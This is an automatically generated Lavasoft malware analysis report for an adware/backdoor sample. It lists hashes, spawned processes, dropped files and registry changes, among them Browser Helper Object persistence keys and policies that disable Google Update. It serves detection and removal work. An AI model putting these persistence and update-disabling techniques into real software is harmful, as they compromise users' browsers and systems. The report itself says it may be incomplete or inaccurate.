Gen.Variant.Adware.Symmi.49922_1cae3ce628

by malwarelabrobot on January 19th, 2015 in Malware Descriptions.

Gen:Variant.Adware.Symmi.49922 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Backdoor, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 1cae3ce62857807fb52a3fa4bf6a6107
SHA1: e8ce1d3840b4169bedf695bf6a63a25655297063
SHA256: f7fb614d095924f9d4f4871303351178dc4d88bd0199dd0c1bfaadb0ecb3dc81
SSDeep: 24576:e0INoLhRU4UxuXI8q03ZY9z/WKL25xfCXfTx4U:e3yLj5XIOY9zO PTx
Size: 1356800 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Cinema Plus2.7gV08.01
Created at: 2012-09-17 10:50:48
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

mscorsvw.exe:172
regsvr32.exe:388
regsvr32.exe:1776
rundll32.exe:1848
rundll32.exe:1324
%original file name%.exe:2008
%original file name%.exe:1664
%original file name%.exe:1252
%original file name%.exe:596
TyHelpTFUO.exe:1516

The Backdoor injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2008 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (10801 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@masterial[1].txt (219 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\CmPMt7BDxLvtoE[1].ca (5431 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (26 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (508 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\progressbar.gif (588 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a (0 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (0 bytes)

The process %original file name%.exe:1664 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\Follow\Follow.dat (6 bytes)
%Program Files%\Follow\Follow.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\wKjUaVakO6heQO[1].ca (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (1491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (281 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (0 bytes)

The process %original file name%.exe:1252 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\loader.gif (2 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (10294 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bestories[1].txt (219 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\yNMtlpV56NSC6w[1].ca (5431 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (24 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb (7 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (518 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (0 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195 (0 bytes)

The process %original file name%.exe:596 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1[1].txt (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini.task (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_2_1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1.ini.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\%original file name%.exe (37624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_1[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\1_1_3[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1_2[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\bg.ca (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\1_1_4[1].txt (10 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_2.ini (0 bytes)

The process TyHelpTFUO.exe:1516 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\Supporter\Supporter.dll (262021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)

Registry activity

The process mscorsvw.exe:172 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process regsvr32.exe:388 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 82 81 9D 95 3C BB AF 7E 3E C4 E6 DF DD 99 0A"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_\CurVer]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9"

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\VersionIndependentProgID]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_"

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\0\win32]
"(Default)" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{ad7efdf6-aec2-4b6b-b677-0b880379eb76}" = "1"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9]
"(Default)" = "YoUtuBeeAdBlockke"

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
"(Default)" = "YoUtuBeeAdBlockke"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9\CLSID]
"(Default)" = "{ad7efdf6-aec2-4b6b-b677-0b880379eb76}"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_\CLSID]
"(Default)" = "{ad7efdf6-aec2-4b6b-b677-0b880379eb76}"

[HKCR\Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.Pad7efdf6_aec2_4b6b_b677_0b880379eb76_]
"(Default)" = "YoUtuBeeAdBlockke"

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\ProgID]
"(Default)" = "Pad7efdf6_aec2_4b6b_b677_0b880379eb76_.9"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
"(Default)" = "YoUtuBeeAdBlockke"

"NoExplorer" = "1"

The Backdoor deletes the following registry key(s):

[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\ProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\Programmable]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\VersionIndependentProgID]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}\InprocServer32]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKCR\CLSID\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{ad7efdf6-aec2-4b6b-b677-0b880379eb76}]

The process regsvr32.exe:1776 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_]
"(Default)" = "PriceLeses"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9]
"(Default)" = "PriceLeses"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9\CLSID]
"(Default)" = "{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}"

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_\CLSID]
"(Default)" = "{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
"(Default)" = "PriceLeses"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\VersionIndependentProgID]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"

[HKCR\Interface\{0F19EF48-CB8C-416A-B84C-C33B02970632}]
"(Default)" = "IRegistry"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}" = "1"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\HELPDIR]
"(Default)" = "%Program Files%\PriceLeses"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
"(Default)" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll"

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\ProgID]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE E3 FF 45 93 DB FE BC 0D F2 05 18 15 7A C9 29"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\TypeLib]
"(Default)" = "{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{E0D6077D-7186-48B2-A6C6-2F7C533E8CFF}\1.0\0\win32]
"(Default)" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}]
"(Default)" = "ILocalStorage"

[HKCR\Interface\{DFF50D27-9859-4F50-9BE1-A4CBFA102B9D}\TypeLib]
"Version" = "1.0"

[HKCR\Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_\CurVer]
"(Default)" = "Pc75d6ccb_c58f_49ea_a84b_ac144ecbe8c8_.9"

[HKCR\Interface\{382F6195-1B46-40D5-B9FD-0493263E6132}]
"(Default)" = "IPlaghinMein"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
"(Default)" = "PriceLeses"

"NoExplorer" = "1"

The Backdoor deletes the following registry key(s):

[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\ProgID]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\Programmable]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\InprocServer32]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}]
[HKCR\CLSID\{c75d6ccb-c58f-49ea-a84b-ac144ecbe8c8}\VersionIndependentProgID]

The process rundll32.exe:1848 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E EB F7 3C 05 22 3E 15 AE CC 81 7C 89 51 FC 3A"

The process rundll32.exe:1324 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"e46c271e" = "///%"
"c24899a6" = "Vx/g/CD/Mx////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"27ddcf6f" = "///%"
"a0743acc" = "N/////%%"
"0e93c3f3" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
"bbf88800" = "///%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"
"7367429f" = "///%"
"f0bf0bde" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"
"6185d035" = "VP/h/CP/V//l////"
"414bc593" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"340d3099" = "/P////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"65114b36" = "Vl/l////"
"587b5709" = "V/////%%"
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 40 1D 03 0E E7 F9 2E BE 0E FB C2 96 A3 A8 F0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"
"c99a5f5c" = "///%"
"a2e3b941" = "///%"
"3c09c42b" = "///%"
"72758a5d" = "///%"
"2e22d94e" = "///%"
"d1abcdb6" = "///%"
"f6ad6fa6" = "V/////%%"
"2d71d5ab" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"

The process %original file name%.exe:2008 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"SilentUninstall" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"DisplayName" = "PriceLeses"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"UninstallString" = "%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"ProductName" = "PriceLeses"

"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"InfoURL" = "http://pricelessorsoft.com"
"NoModify" = "1"

